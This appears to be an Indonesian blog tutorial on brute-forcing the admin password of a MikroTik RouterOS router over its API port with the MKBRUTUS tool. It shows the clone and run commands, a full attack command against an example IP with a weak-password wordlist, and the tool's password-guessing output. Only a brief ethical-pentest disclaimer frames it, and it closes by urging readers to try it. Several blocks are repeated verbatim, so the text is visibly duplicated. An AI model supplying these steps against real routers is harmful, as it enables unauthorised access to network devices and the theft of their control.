Mkbrutus adalah Password bruteforcer untuk perangkat atau kotak MikroTik yang menjalankan RouterOS.
Beberapa kotak yang menjalankan Mikrotik RouterOS (3.x atau yang lebih baru) mengaktifkan port API (secara default, di port 8728 / TCP) untuk tujuan administratif, bukan SSH, Winbox atau HTTPS (atau semuanya).
Ini adalah vektor serangan (yang lain) karena mungkin melakukan bruteforce untuk mendapatkan kredensial yang valid jika tidak ada perlindungan yang tersedia di port tersebut.
Karena API menggunakan protokol privatif khusus, beberapa kode yang diterbitkan oleh vendor disertakan.
Python 3.x diperlukan untuk menjalankan tool ini.
Penulis Mkbrutus:
Ramiro Caire - email: ramiro.caire@gmail.com / Twitter: @rcaire
Federico Massa - email: fmassa@vanguardsec.com / Twitter: @fgmassa
Website resmi:
http://mkbrutusproject.github.io/MKBRUTUS/
https://github.com/mkbrutusproject/mkbrutus
Alat ini ditujukan hanya untuk pengujian keamanan perangkat Mikrotik dalam proses
pentest atau audit etis.
Penulis tidak bertanggung jawab atas kerusakan yang Anda gunakan pada alat ini.
Bahan-bahan yang saya gunakan dan target itu sendiri.
Sytem Operasi : Parrot Security
Tool : Mkbrutus 1.0.2
Wordlist : 500-worst-passwords.txt
Target : RouterOS v6.35.4
Ip target : 192.168.20.1
Karena API menggunakan protokol privatif khusus, beberapa kode yang diterbitkan oleh vendor disertakan.
Python 3.x diperlukan untuk menjalankan tool ini.
Penulis Mkbrutus:
Ramiro Caire - email: ramiro.caire@gmail.com / Twitter: @rcaire
Federico Massa - email: fmassa@vanguardsec.com / Twitter: @fgmassa
Website resmi:
http://mkbrutusproject.github.io/MKBRUTUS/
https://github.com/mkbrutusproject/mkbrutus
Alat ini ditujukan hanya untuk pengujian keamanan perangkat Mikrotik dalam proses
pentest atau audit etis.
Penulis tidak bertanggung jawab atas kerusakan yang Anda gunakan pada alat ini.
Bahan-bahan yang saya gunakan dan target itu sendiri.
Sytem Operasi : Parrot Security
Tool : Mkbrutus 1.0.2
Wordlist : 500-worst-passwords.txt
Target : RouterOS v6.35.4
Ip target : 192.168.20.1
Tutorial
1. Download Mkbrutus dengan cara mengunjungi website resmi nya atau bisa juga lewat terminal linux, dan download juga wordlist untuk bruteforce tersebut atau lebih baik buat sendiri agar lebih spesifik.
┌─[user@parrot]─[~]
└──╼ $cd Desktop
┌─[user@parrot]─[~/Desktop]
└──╼ $git clone https://github.com/mkbrutusproject/MKBRUTUS.git
└──╼ $cd Desktop
┌─[user@parrot]─[~/Desktop]
└──╼ $git clone https://github.com/mkbrutusproject/MKBRUTUS.git
2. Selanjutnya buka Mkbrutus dan mari kita jalankan tool tersebut jangan lupa menggunakan root atau super user dalam menjalankan Mkbrutus.
┌─[user@parrot]─[~]
└──╼ $su
Password:
┌─[root@parrot]─[/home/user]
└──╼ #cd Desktop
┌─[root@parrot]─[/home/user/Desktop]
└──╼ #cd MKBRUTUS
┌─[root@parrot]─[/home/user/Desktop/MKBRUTUS]
└──╼ #python3 mkbrutus.py -h
└──╼ $su
Password:
┌─[root@parrot]─[/home/user]
└──╼ #cd Desktop
┌─[root@parrot]─[/home/user/Desktop]
└──╼ #cd MKBRUTUS
┌─[root@parrot]─[/home/user/Desktop/MKBRUTUS]
└──╼ #python3 mkbrutus.py -h
Nanti akan keluar menu, cara pemakaian dan fitur-fitur yang tersedia dalam Mkbrutus seperti yang di bawah ini.
NAME
MKBRUTUS.py - Password bruteforcer for MikroTik devices or boxes running RouterOS
USAGE
python mkbrutus.py [-t] [-p] [-u] [-d] [-s] [-q]
OPTIONS
-t, --target RouterOS target
-p, --port RouterOS port (default 8728)
-u, --user User name (default admin)
-h, --help This help
-d, --dictionary Password dictionary
-s, --seconds Delay seconds between retry attempts (default 1)
-q, --quiet Quiet mode
3. Langkah selanjutnya taruh wordlist yang kamu download atau buat tadi ke dalam direktori Mkbrutus dan Nanti kita akan membrute force login admin mikrotik router tersebut.
┌─[root@parrot]─[/home/user/Desktop/MKBRUTUS]
└──╼ #ls
500-worst-passwords.txt agpl.txt CHANGELOG LICENSE mkbrutus.py README.md
┌─[root@parrot]─[/home/user/Desktop/MKBRUTUS]
└──╼ #python3 mkbrutus.py -t 192.168.20.1 -d 500-worst-passwords.txt
└──╼ #ls
500-worst-passwords.txt agpl.txt CHANGELOG LICENSE mkbrutus.py README.md
┌─[root@parrot]─[/home/user/Desktop/MKBRUTUS]
└──╼ #python3 mkbrutus.py -t 192.168.20.1 -d 500-worst-passwords.txt
Keterangan :
-t adalah perintah untuk mengambil RouterOS target
192.168.20.1 adalah ip dari RouterOS target
-d adalah perintah untuk mengambil wordlist
500-worst-passwords.txt adalah nama wordlist yang saya gunakan
Dan jika sedang berjalan akan seperti di bawah ini.
[*] Starting bruteforce attack...
---------------------------------
[-]Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 500 passwords in list...
[-] Trying 1 of 500 Paswords - Current: admin
[-] Trying 2 of 500 Paswords - Current: user
[-] Trying 3 of 500 Paswords - Current: administrator
[-] Trying 4 of 500 Paswords - Current: wifi
---------------------------------
[-]Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 500 passwords in list...
[-] Trying 1 of 500 Paswords - Current: admin
[-] Trying 2 of 500 Paswords - Current: user
[-] Trying 3 of 500 Paswords - Current: administrator
[-] Trying 4 of 500 Paswords - Current: wifi
Selanjutnya tunggu hingga Mkbrutus mendeteksi adanya password yang benar.
"Keberhasilan dalam serangan brute force adalah pada wordlist nya yang spesifik"
Good luck!! selamat mencoba!!
2 komentar